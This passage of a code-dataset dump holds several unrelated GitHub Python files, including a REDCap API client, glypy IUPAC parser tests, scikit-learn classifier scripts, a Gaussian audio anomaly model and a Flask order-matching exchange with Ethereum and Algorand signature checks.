checkbox_labels=checkbox_labels,\n params={\"report_id\": report_id},\n )\n\n def get_selector_choice_map(self):\n \"\"\"Returns a map for every field that needs translation from index to\n value:\n {\n : {\n : ,\n ...\n },\n ...\n }\n \"\"\"\n store = dict()\n forms = set()\n for m in self.get_data_dictionary():\n forms.add(m[\"form_name\"])\n if m[\"field_type\"] in {\"dropdown\", \"radio\", \"checkbox\"}:\n store[m[\"field_name\"]] = {\n k.strip(): v.strip()\n for k, v in map(\n lambda x: x.split(\",\", 1),\n m[\"select_choices_or_calculations\"].split(\"|\"),\n )\n }\n elif m[\"field_type\"] == \"yesno\":\n store[m[\"field_name\"]] = {\"1\": \"Yes\", \"0\": \"No\"}\n elif m[\"field_type\"] == \"truefalse\":\n store[m[\"field_name\"]] = {\"1\": \"True\", \"0\": \"False\"}\n\n for f in forms:\n store[f + \"_complete\"] = {\n \"2\": \"Complete\",\n \"1\": \"Unverified\",\n \"0\": \"Incomplete\",\n }\n return store\n\n def get_records_tree(self, debug_type=\"flat\", raw_selectors=False):\n \"\"\"Returns all data from the study in the nested form:\n {\n : { # event data\n : { # instrument data\n : { # subject data for this event+instrument\n : { # subject event+instrument instance\n : set(), # field values\n ...\n },\n ...\n },\n ...\n },\n ...\n },\n ...\n }\n \"\"\"\n # this is where we'll store all the data\n store = defaultdict( # events\n lambda: defaultdict( # instruments\n lambda: defaultdict( # subjects\n lambda: defaultdict( # instances\n lambda: defaultdict(set) # field names # values\n )\n )\n )\n )\n\n data_dict = self.get_data_dictionary()\n record_id_field = data_dict[0][\"field_name\"]\n field_forms = {m[\"field_name\"]: m[\"form_name\"] for m in data_dict}\n # \"_complete\" fields are not considered part of the\n # instruments, so include them specially\n for inst in set(field_forms.values()):\n field_forms[f\"{inst}_complete\"] = inst\n\n event_forms = defaultdict(set)\n for iem in self.get_instrument_event_mappings():\n event_forms[iem[\"unique_event_name\"]].add(iem[\"form\"])\n\n selector_map = self.get_selector_choice_map()\n\n # We could retrieve labels instead of raw, but two different\n # instruments could be given the same name which are meant to be\n # interpreted based on context. 
That may mean that we couldn't\n # differentiate between the two, so we should defer translating headers\n # until the very end.\n #\n # Unfortunately there's no way to independently ask for translated\n # selector values (e.g. \"Female\" instead of \"1\") without also asking\n # for translated headers, so asking for raw means doing a lot more work\n # selectively digging through project metadata to map the selectors.\n # This is made more difficult by the fact that the REDCap project\n # metadata uniformly categorizes fields by their instrument name, but\n # the records API doesn't report the instrument name for records that\n # come from instruments that aren't repeating. Maybe that will change,\n # but this code would probably keep working anyway. - Nov 2019\n\n errors = defaultdict(list)\n all_subjects = set()\n for r in self.get_records(\n type=debug_type,\n raw=True,\n raw_headers=True,\n checkbox_labels=False,\n survey_fields=True,\n data_access_groups=True,\n ):\n\n def _check_error_map_add():\n def _record_error(what):\n errors[what].append(\n {\n \"event\": event,\n \"subject\": subject,\n \"field\": field,\n \"value\": value,\n \"form\": form,\n }\n )\n\n mapped_value = value\n if (not raw_selectors) and (field in selector_map):\n if value not in selector_map[field]:\n # Is this code the right place for data error checks?\n # Consider removing this.\n if value in selector_map[field].values():\n _record_error(\"choice value as text\")\n else:\n _record_error(\"choice value is missing\")\n return False\n mapped_value = selector_map[field][value]\n if field not in field_forms:\n return False\n if event not in event_forms:\n return False\n if form not in event_forms[event]:\n return False\n if field != record_id_field:\n if field == f\"{form}_complete\":\n store[event][form][subject][instance][field] = {\n mapped_value\n }\n else:\n store[event][form][subject][instance][field].add(\n mapped_value\n )\n return True\n\n event = r.pop(\"redcap_event_name\")\n\n # The API will return 1, \"2\", for repeat instances.\n # Note that 1 was an int and 2 was a str.\n # The API can also return \"\" or nothing at all.\n instance = str(r.pop(\"redcap_repeat_instance\", \"1\") or \"1\")\n repeat_form = r.pop(\"redcap_repeat_instrument\", None)\n\n if debug_type == \"eav\":\n subject = r[\"record\"]\n all_subjects.add(subject)\n\n field = r[\"field_name\"]\n value = r[\"value\"]\n form = repeat_form or field_forms.get(field)\n\n _check_error_map_add()\n else:\n subject = r.pop(record_id_field)\n all_subjects.add(subject)\n\n for field, value in r.items():\n form = repeat_form or field_forms.get(field)\n\n if re.search(r\"___\\d+$\", field): # probably checkboxes\n real_field, real_value = field.rsplit(\"___\", 1)\n if real_field in selector_map: # definitely checkboxes\n if value == \"0\":\n continue # checkbox not selected\n if value == \"\":\n continue # checkbox not present\n\n field = real_field\n value = real_value\n form = field_forms.get(field)\n\n if value == \"\": # regular field not populated\n continue\n\n _check_error_map_add()\n\n for event_name, event_form_names in event_forms.items():\n for form_name in event_form_names:\n for subject in all_subjects:\n if not store[event_name][form_name][subject]:\n store[event_name][form_name][subject] = {\"1\": dict()}\n for i, iv in store[event_name][form_name][subject].items():\n if f\"{form_name}_complete\" not in iv:\n store[event_name][form_name][subject][i][\n f\"{form_name}_complete\"\n ] = {\"Incomplete\"}\n\n return 
_undefault_dict(store), _undefault_dict(errors)\n","repo_name":"d3b-center/d3b-redcap-api-python","sub_path":"d3b_redcap_api/redcap.py","file_name":"redcap.py","file_ext":"py","file_size_in_byte":23139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"32352140717","text":"from numpy import ndarray, array\nfrom bolt.spark.array import BoltArraySpark\nfrom thunder.series import fromarray, fromrdd\n\ndef toseries(y):\n\n if type(y) is ndarray:\n y = fromarray(y)\n elif type(y) is BoltArraySpark:\n y = fromrdd(y.tordd())\n\n if len(y.shape) != 2:\n raise ValueError(\"factorization on for 2-dimensional arrays\")\n\n return y\n","repo_name":"justinplittle/thunder-factorization","sub_path":"factorization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"20"} +{"seq_id":"21158241112","text":"import unittest\n\n\nimport glypy\nfrom glypy.composition import composition_transform\nfrom . import common\nfrom glypy.io import iupac, glycoct\n\nmonosaccharides = common.monosaccharides\n\n\nclass IUPACTests(unittest.TestCase):\n def test_monosaccharide_to_iupac(self):\n iupac_residue = iupac.to_iupac(monosaccharides.Fucose)\n reference = \"a-L-Fucp\"\n self.assertEqual(iupac_residue, reference)\n\n def test_hexa(self):\n text = \"a-D-HexpA\"\n result = iupac.from_iupac(text)\n self.assertAlmostEqual(result.mass(), 194.042, 2)\n\n def test_autoname_substituent(self):\n h = monosaccharides.Hex\n h.add_substituent(\"phosphate\")\n iupac.substituents_map_to.pop(\"phosphate\")\n t = iupac.to_iupac(h)\n r = iupac.from_iupac(t)\n self.assertEqual(h, r)\n\n def test_special_cases(self):\n for text, mass in [('?-D-Neup', 267.095), ('?-D-Neup5Ac', 309.105), ('a-D-Neup5NGc', 325.100)]:\n self.assertAlmostEqual(iupac.from_iupac(\n iupac.to_iupac(iupac.from_iupac(text))).mass(), mass, 2)\n\n def test_ring_type(self):\n for text, start, stop in [(\"a-D-Hexp\", 1, 5), (\"a-D-Hexf\", 1, 4), (\"a-D-Hexo\", 0, 0)]:\n mono = iupac.from_iupac(text)\n self.assertEqual(mono.ring_start, start)\n self.assertEqual(mono.ring_end, stop)\n\n def test_alternate_superclass(self):\n text = \"a-D-2-deoxy-araHex\"\n mono = iupac.from_iupac(text)\n self.assertEqual(mono.stem[0], 'ara')\n\n def test_monosaccharide_from_iupac(self):\n text = \"a-L-Fucp\"\n reference = monosaccharides.Fucose\n result = iupac.from_iupac(text)\n self.assertEqual(result, reference)\n\n def test_glycan_to_iupac(self):\n reference = 'a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'\n structure = common.load(\"complex_glycan\")\n self.assertEqual(iupac.to_iupac(structure), reference)\n\n def test_glycan_from_iupac(self):\n text = 'a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'\n reference = common.load(\"complex_glycan\")\n self.assertEqual(glycoct.canonicalize(iupac.from_iupac(text)), 
glycoct.canonicalize(reference))\n\n def test_glycan_from_iupac_file_like(self):\n text = '''>test\n a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1\n -3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp\n -(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'''\n reader = iupac.IUPACParser.loads(text, 'fasta')\n structure = next(reader)\n\n text = 'a-L-Fucp-(1-6)-[a-D-Neup5Ac-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-6)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-6)-[b-D-Glcp2NAc-(1-4)][b-D-Galp2NAc-(1-4)-b-D-Glcp2NAc-(1-4)-[a-D-Neup5Gc-(2-3)-b-D-Galp-(1-4)-[a-L-Fucp-(1-3)]b-D-Glcp2NAc-(1-2)]a-D-Manp-(1-3)]b-D-Manp-(1-4)-b-D-Glcp2NAc-(1-4)]?-D-Glcp2NAc'\n equiv = next(iupac.IUPACParser.loads(text, 'line'))\n self.assertEqual(equiv, structure)\n\n\nclass DerivatizationAwareIUPACTests(unittest.TestCase):\n def test_monosaccharide_parse(self):\n text = '?-?-Hexp2NAc^Me'\n parser = iupac.DerivatizationAwareMonosaccharideDeserializer()\n obj, _ = parser(text)\n ref = composition_transform.derivatize(glypy.monosaccharides.HexNAc, 'methyl')\n self.assertEqual(obj, ref)\n\n def test_monosaccharide_serialize(self):\n obj = composition_transform.derivatize(glypy.monosaccharides.HexNAc, 'methyl')\n ref = '?-?-Hexp2NAc^Me'\n serializer = iupac.DerivatizationAwareMonosaccharideSerializer()\n text = serializer(obj)\n self.assertEqual(text, ref)\n\n def test_derivatized_glycan_parse(self):\n ref = composition_transform.derivatize(\n glypy.motifs[\"N-Glycan complex 1\"], \"methyl\")\n serializer = iupac.GlycanSerializer(iupac.DerivatizationAwareMonosaccharideSerializer())\n text = serializer(ref)\n deserializer = iupac.GlycanDeserializer(iupac.DerivatizationAwareMonosaccharideDeserializer())\n obj = deserializer(text)\n self.assertEqual(obj, ref)\n\n def test_compatible_with_non_derivatized(self):\n serializer = iupac.GlycanSerializer(iupac.DerivatizationAwareMonosaccharideSerializer())\n deserializer = iupac.GlycanDeserializer(iupac.DerivatizationAwareMonosaccharideDeserializer())\n self.assertEqual(\n deserializer(\n serializer(\n glypy.motifs[\"N-Glycan complex 1\"])),\n glypy.motifs[\"N-Glycan complex 1\"])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mobiusklein/glypy","sub_path":"tests/test_iupac.py","file_name":"test_iupac.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"20"} +{"seq_id":"38956292472","text":"import matplotlib.pyplot as plt \r\nfrom sklearn import datasets\r\nfrom sklearn import svm\r\ni=int(input(\"ENTER ANY RANDOM NUMBER LESS THAN 1700: \"))\r\ndigits= datasets.load_digits()\r\nclf =svm.SVC(gamma=0.0001,C=100)\r\nx,y= digits.data[:-1], digits.target[:-1]\r\nclf.fit(x,y)\r\nprint(\"PREDICTION: \", clf.predict(digits.data[[i]]))\r\nplt.imshow(digits.images[i], cmap=plt.cm.gray_r, interpolation='nearest')\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"SAUMITRAJAGDALE/Image_Classification_SVM","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"24779938751","text":"# Importing the libraries\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport 
nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom sklearn.preprocessing import Imputer\n\nnltk.download('stopwords')\n\n\n# Importing the dataset\ndef read_data(path):\n\n print('reading data')\n dataset = pd.read_csv(path)\n # Taking care of missing data\n imputer = Imputer(missing_values = 'NaN', strategy = 'most_frequent', axis = 0)\n dataset['class'] = imputer.fit_transform(dataset[['class']]).ravel()\n x = dataset.iloc[:, :-1].values\n print('Start bag of words')\n x = bag_of_words(x)\n y = dataset.iloc[:, 1].values\n # Splitting the dataset into the Training set and Test set\n print('splitting data')\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.20, random_state=0, shuffle=True)\n print('data was read')\n return x_train, x_test, y_train, y_test, x\n\n\n# Creating Bag of Words model\ndef bag_of_words(x):\n\n corpus = []\n for i in range(0, len(x)):\n try:\n content = open_link(''.join(x[i]))\n except Exception:\n pass\n page = re.sub('[^\\u0627-\\u064a]', ' ', str(content))\n page = page.lower()\n page = page.split()\n ps = PorterStemmer()\n page = [ps.stem(word) for word in page if not word in set(stopwords.words('arabic'))]\n page = ' '.join(page)\n corpus.append(page)\n print((i + 1) / len(x) * 100, '%')\n print(i + 2)\n\n cv = CountVectorizer(max_features=1500)\n x = cv.fit_transform(corpus).toarray()\n\n return x\n\n\n# Get link data\ndef open_link(link):\n\n f = requests.get(link)\n page = BeautifulSoup(f.content, 'html.parser')\n return page\n\n\n# Train data\ndef train_data(x_train, y_train):\n\n print('start training data')\n # Fitting Naive Bayes to the Training set\n classifier = GaussianNB()\n print('fitting data')\n classifier.fit(x_train, y_train)\n print('training finished')\n return classifier\n\n\ndef get_results(classifier, x_test, y_test):\n # Predicting the Test set results\n predictions = classifier.predict(x_test)\n accuracy = accuracy_score(y_test, predictions)\n score = f1_score(y_test,predictions)\n print('testing results: ')\n return score, accuracy\n\n\nif __name__ == \"__main__\":\n x_train, x_test, y_train, y_test,x = read_data('Dataset.csv')\n classifier = train_data(x_train, y_train)\n score, accuracy = get_results(classifier, x_test, y_test)\n print('score = ', score*100, '%')\n print('accuracy = ', accuracy*100, '%')\n","repo_name":"agtaweel/LinksClassification","sub_path":"LinksClassificationTask.py","file_name":"LinksClassificationTask.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"11286296289","text":"import numpy as np\nfrom signal_likelihood import SignalLikelihood\nimport unittest\nfrom numpy.testing import assert_array_almost_equal,assert_almost_equal, assert_equal\nimport math\n\n\"\"\"\nModels the ambient audio scenery with a multivariate\nGaussian distributions. Based on that model we can distinguish \nbetween the ambient sounds and sounds that are \nunlikely to occur naturally. \n\nThis model allows for correlations between the input values. 
\n\n\"\"\" \nclass MultivariateGaussian(SignalLikelihood):\n def __init__(self): \n self.mean = None \n self.var = None\n self.sumSquareDif = None\n self.n = 0 \n\n def train(self, features):\n \"\"\"\n Updates the mean and variance of the gaussian model capturing the \n ambient sound scenery. \n \"\"\"\n if self.mean is None:\n # no previous mean or variance exist \n self.mean = features\n\n # we need a zero vector with the size of the feature vector\n self.sumSquareDif = np.zeros_like(features)\n self.var = np.zeros_like(features)\n self.n = 1\n else: \n # previous mean is old_sum / old_n => new_sum = (old_sum * old_n) + new values \n old_mean = self.mean \n old_sum = old_mean * self.n \n new_sum = old_sum + features \n self.n = self.n + 1\n self.mean = new_sum / self.n \n\n # vectorizaed adaption of Knuth's online variance algorithm\n # the original algorithm can be found here: \n # Donald E. Knuth (1998). The Art of Computer Programming, volume 2: \n # Seminumerical Algorithms, 3rd edn., p. 232. Boston: Addison-Wesley.\n\n # update sum of square differences \n self.sumSquareDif = self.sumSquareDif + (features - old_mean) * (features - self.mean)\n\n # update variance \n self.var = self.sumSquareDif / (self.n - 1)\n\n def calculate_prob(self, features):\n \"\"\" \n Calculates the probability that the signal described by the \n features is an ambient sound. \n \"\"\" \n if np.any(self.var == 0): \n return 0 \n\n # this is a vectorized version of the pdf of a normal distribution for each frequency amplitude\n # it returns one probability for each of the signal's frequency amplitudes \n probs = np.exp(-(features-self.mean)**2/(2.*self.var**2)) / (math.sqrt(math.pi * 2.) * self.var)\n\n # simplificaiton: assumption of independent frequencies => product \n return np.prod(probs)\n\n\nclass GaussianTests(unittest.TestCase):\n def train(self, data): \n gaussian = Gaussian() \n\n for datum in data: \n gaussian.train(datum)\n\n return gaussian\n\n def checkMean(self, data, expectedMean): \n gaussian = self.train(data) \n assert_almost_equal(gaussian.mean, expectedMean)\n\n def checkVariance(self, data, exptectedVar): \n gaussian = self.train(data)\n assert_almost_equal(gaussian.var, exptectedVar)\n\n\n def test_mean_for_one_feature(self):\n data = [np.array([0.]), np.array([6.]), np.array([10.]), np.array([8.])]\n expectedMean = np.array([6.])\n\n self.checkMean(data, expectedMean)\n\n def test_mean_for_multiple_features(self):\n data = [np.array([0., 3.]), np.array([6., 8.]), np.array([10., 4.]), np.array([8., 7.])]\n expectedMean = np.array([6., 5.5])\n\n self.checkMean(data, expectedMean)\n\n def test_variance_for_one_feature(self):\n data = [np.array([1.]), np.array([0.]), np.array([2.]), np.array([1.]), np.array([0.])]\n expectedVariance = np.array([0.7])\n\n self.checkVariance(data, expectedVariance)\n\n def test_variance_for_one_feature(self):\n data = [np.array([1., 0.]), np.array([0., 2.]), np.array([2., 1.]), np.array([1., 0.]), np.array([0., 1.])]\n expectedVariance = np.array([0.7, 0.7])\n\n self.checkVariance(data, expectedVariance)\n\n def test_probability_calculation(self): \n gaussian = Gaussian() \n gaussian.mean = np.array([5., 3.])\n gaussian.var = np.array([2., 1.])\n x = np.array([4.,4.])\n\n expected = 0.0426 \n actual = gaussian.calculate_prob(x)\n assert_almost_equal(actual,expected, decimal=4)\n\n 
","repo_name":"rfcx/defunct","sub_path":"sound-localization/localization/multivariate_gaussian.py","file_name":"multivariate_gaussian.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20638581628","text":"def isprime(x):\r\n for i in range(2,x):\r\n if x%i==0:\r\n return False\r\n return True\r\n\r\ndef mini_number(string):\r\n s1=string[0]\r\n s2=string[1]\r\n if int(s1)*int(s2)<=9 and len(string)>=3:\r\n string=str(int(s1)*int(s2))+string[2:]\r\n return mini_number(string)\r\n else:\r\n tmp_string=list(string)\r\n tmp_string.sort()\r\n string=\"\"\r\n for i in range(len(tmp_string)):\r\n string+=tmp_string[i]\r\n return int(string)\r\n \r\ndef checkio(num):\r\n tmp=\"\"\r\n end_num=num\r\n while end_num>1:\r\n for i in range(2,10):\r\n if end_num%i==0 and isprime(i):\r\n tmp+=str(i)\r\n end_num=end_num//i\r\n break\r\n if isprime(end_num):\r\n tmp+=str(end_num)\r\n break\r\n n=1\r\n for j in range(len(tmp)):\r\n n=n*int(tmp[j])\r\n if n!=num:\r\n return 0\r\n\r\n else:\r\n return int(tmp)\r\n \r\n \r\n\r\n\r\n\r\n \r\n##print(checkio(33))\r\n##print(checkio(20))\r\n##print(checkio(3125))\r\n##print(checkio(9973))\r\n##print(checkio(8146))\r\n##print(checkio(17))\r\n##print(checkio(560))\r\nprint(checkio(12))\r\n","repo_name":"arua23/checkio_solutions","sub_path":"numbers_factory_tmp.py","file_name":"numbers_factory_tmp.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"14123640945","text":"from flask import Flask, request, g\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom flask import jsonify\nimport json\nimport eth_account\nimport algosdk\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import load_only\nfrom datetime import datetime\nimport sys\n\nfrom models import Base, Order, Log\n\nengine = create_engine('sqlite:///orders.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\napp = Flask(__name__)\n\n\n@app.before_request\ndef create_session():\n g.session = scoped_session(DBSession)\n\n\n@app.teardown_appcontext\ndef shutdown_session(response_or_exc):\n sys.stdout.flush()\n g.session.commit()\n g.session.remove()\n\n\n\"\"\" Suggested helper methods \"\"\"\n\n\ndef check_sig(payload, sig):\n \n payload_dict = json.loads(payload)\n platform = payload_dict['platform']\n pk = payload_dict['sender_pk']\n\n verification_result = False\n\n if platform == 'Ethereum':\n eth_encoded_msg = eth_account.messages.encode_defunct(text=payload)\n if eth_account.Account.recover_message(eth_encoded_msg, signature=sig) == pk:\n verification_result = True\n\n elif platform == 'Algorand':\n if algosdk.util.verify_bytes(payload.encode('utf-8'), sig, pk):\n verification_result = True\n\n return verification_result\n\n\ndef fill_order(order, txes=[]):\n buy_currency = order['buy_currency']\n sell_currency = order['sell_currency']\n buy_amount = order['buy_amount']\n sell_amount = order['sell_amount']\n sender_pk = order['sender_pk']\n receiver_pk = order['receiver_pk']\n implied_exchange_rate = buy_amount / sell_amount\n new_order_sell_rate = sell_amount / buy_amount\n\n order_obj = Order(sender_pk=order['sender_pk'], receiver_pk=order['receiver_pk'],\n buy_currency=order['buy_currency'], sell_currency=order['sell_currency'],\n buy_amount=order['buy_amount'], 
sell_amount=order['sell_amount'])\n g.session.add(order_obj)\n g.session.commit()\n\n new_order_ID = order_obj.id\n\n query = g.session.query(Order).filter(\n Order.filled == None, Order.buy_currency == sell_currency, Order.sell_currency == buy_currency\n )\n result = g.session.execute(query)\n amount = 0\n id_order_matched = 0\n\n for order in result.scalars().all():\n existing_order_exchange_rate = order.sell_amount / order.buy_amount\n if existing_order_exchange_rate >= implied_exchange_rate:\n if order.sell_amount > amount:\n amount = sell_amount\n id_order_matched = order.id\n #pass\n\n if id_order_matched != 0:\n existing_order_sell_amount = 0\n existing_order_buy_amount = 0\n existing_order_sell_rate = 0\n existing_order_sender_pk = None\n existing_order_receiver_pk = None\n\n now = datetime.now()\n\n query1 = g.session.query(Order).filter(Order.id == id_order_matched)\n result1 = g.session.execute(query1)\n for order in result1.scalars().all():\n order.filled = now\n order.counterparty_id = new_order_ID\n existing_order_sell_amount = order.sell_amount\n existing_order_buy_amount = order.buy_amount\n existing_order_sender_pk = order.sender_pk\n existing_order_receiver_pk = order.receiver_pk\n existing_order_sell_rate = existing_order_sell_amount / existing_order_buy_amount\n g.session.commit()\n\n query2 = g.session.query(Order).filter(Order.id == new_order_ID)\n result2 = g.session.execute(query2)\n for order in result2.scalars().all():\n order.filled = now\n order.counterparty_id = id_order_matched\n g.session.commit()\n\n child_order_obj = None\n\n if existing_order_sell_amount < buy_amount:\n final_sell_amount = existing_order_sell_amount\n final_buy_amount = existing_order_buy_amount\n\n buy_amount = buy_amount - final_buy_amount\n sell_amount = buy_amount * new_order_sell_rate\n creator_id = new_order_ID\n\n child_order = {}\n child_order['sender_pk'] = sender_pk\n child_order['receiver_pk'] = receiver_pk\n child_order['buy_currency'] = buy_currency\n child_order['sell_currency'] = sell_currency\n child_order['buy_amount'] = buy_amount\n child_order['sell_amount'] = sell_amount\n child_order['creator_id'] = creator_id\n\n child_order_obj = Order(sender_pk=child_order['sender_pk'],\n receiver_pk=child_order['receiver_pk'],\n buy_currency=child_order['buy_currency'],\n sell_currency=child_order['sell_currency'],\n buy_amount=child_order['buy_amount'],\n sell_amount=child_order['sell_amount'],\n creator_id=child_order['creator_id'])\n g.session.add(child_order_obj)\n g.session.commit()\n\n\n elif existing_order_sell_amount > buy_amount:\n final_sell_amount = sell_amount\n final_buy_amount = buy_amount\n\n buy_currency_original = buy_currency\n sender_pk = existing_order_sender_pk\n receiver_pk = existing_order_receiver_pk\n buy_currency = sell_currency\n sell_currency = buy_currency_original\n buy_amount = existing_order_buy_amount - final_sell_amount\n sell_amount = buy_amount * existing_order_sell_rate\n creator_id = id_order_matched\n\n child_order = {}\n child_order['sender_pk'] = sender_pk\n child_order['receiver_pk'] = receiver_pk\n child_order['buy_currency'] = buy_currency\n child_order['sell_currency'] = sell_currency\n child_order['buy_amount'] = buy_amount\n child_order['sell_amount'] = sell_amount\n child_order['creator_id'] = creator_id\n\n child_order_obj = Order(sender_pk=child_order['sender_pk'],\n receiver_pk=child_order['receiver_pk'],\n buy_currency=child_order['buy_currency'],\n sell_currency=child_order['sell_currency'],\n 
buy_amount=child_order['buy_amount'],\n sell_amount=child_order['sell_amount'],\n creator_id=child_order['creator_id'])\n\n g.session.add(child_order_obj)\n g.session.commit()\n\n txes.append(order)\n txes.append(child_order)\n\ndef log_message(d):\n # Takes input dictionary d and writes it to the Log table\n # Hint: use json.dumps or str() to get it in a nice string form\n log_obj = Log(message=Log['message'])\n g.session.add(log_obj)\n g.session.commit()\n\n\n\"\"\" End of helper methods \"\"\"\n\n\n@app.route('/trade', methods=['POST'])\ndef trade():\n print(\"In trade endpoint\")\n if request.method == \"POST\":\n content = request.get_json(silent=True)\n print(f\"content = {json.dumps(content)}\")\n columns = [\"sender_pk\", \"receiver_pk\", \"buy_currency\", \"sell_currency\", \"buy_amount\", \"sell_amount\", \"platform\"]\n fields = [\"sig\", \"payload\"]\n\n for field in fields:\n if not field in content.keys():\n print(f\"{field} not received by Trade\")\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n for column in columns:\n if not column in content['payload'].keys():\n print(f\"{column} not received by Trade\")\n print(json.dumps(content))\n log_message(content)\n return jsonify(False)\n\n # Your code here\n # Note that you can access the database session using g.session\n\n # TODO: Check the signature\n result = False\n json_string = json.dumps(content)\n contentPyth = json.loads(json_string)\n\n signature = contentPyth['sig']\n payload = json.dumps(contentPyth['payload'])\n\n verification_result=check_sig(payload, signature)\n\n # TODO: Add the order to the database\n sender_pk = contentPyth['payload']['sender_pk']\n receiver_pk = contentPyth['payload']['receiver_pk']\n buy_currency = contentPyth['payload']['buy_currency']\n sell_currency = contentPyth['payload']['sell_currency']\n buy_amount = contentPyth['payload']['buy_amount']\n sell_amount = contentPyth['payload']['sell_amount']\n\n if verification_result == True:\n order = {}\n order['sender_pk'] = sender_pk\n order['receiver_pk'] = receiver_pk\n order['buy_currency'] = buy_currency\n order['sell_currency'] = sell_currency\n order['buy_amount'] = buy_amount\n order['sell_amount'] = sell_amount\n\n # TODO: Fill the order\n txes = []\n fill_order(order, txes)\n result = True\n else:\n log_message(payload)\n # TODO: Be sure to return jsonify(True) or jsonify(False) depending on if the method was successful\n return (jsonify(result))\n\n@app.route('/order_book')\ndef order_book():\n # Your code here\n # Note that you can access the database session using g.session\n keyList = ['sender_pk', 'receiver_pk', 'buy_currency', 'sell_currency', 'buy_amount', 'sell_amount', 'signature']\n query = g.session.query(Order)\n query_result = g.session.execute(query)\n initial_result = []\n for order in query_result.scalars().all():\n order_dict = dict.fromkeys(keyList)\n order_dict['sender_pk'] = order.sender_pk\n order_dict['receiver_pk'] = order.receiver_pk\n order_dict['buy_currency'] = order.buy_currency\n order_dict['sell_currency'] = order.sell_currency\n order_dict['buy_amount'] = order.buy_amount\n order_dict['sell_amount'] = order.sell_amount\n order_dict['signature'] = order.signature\n initial_result.append(order_dict)\n\n # Note that you can access the database session using g.session\n keyList2 = ['data']\n result = dict.fromkeys(keyList2)\n result['data'] = initial_result\n return jsonify(result)\n\nif __name__ == '__main__':\n 
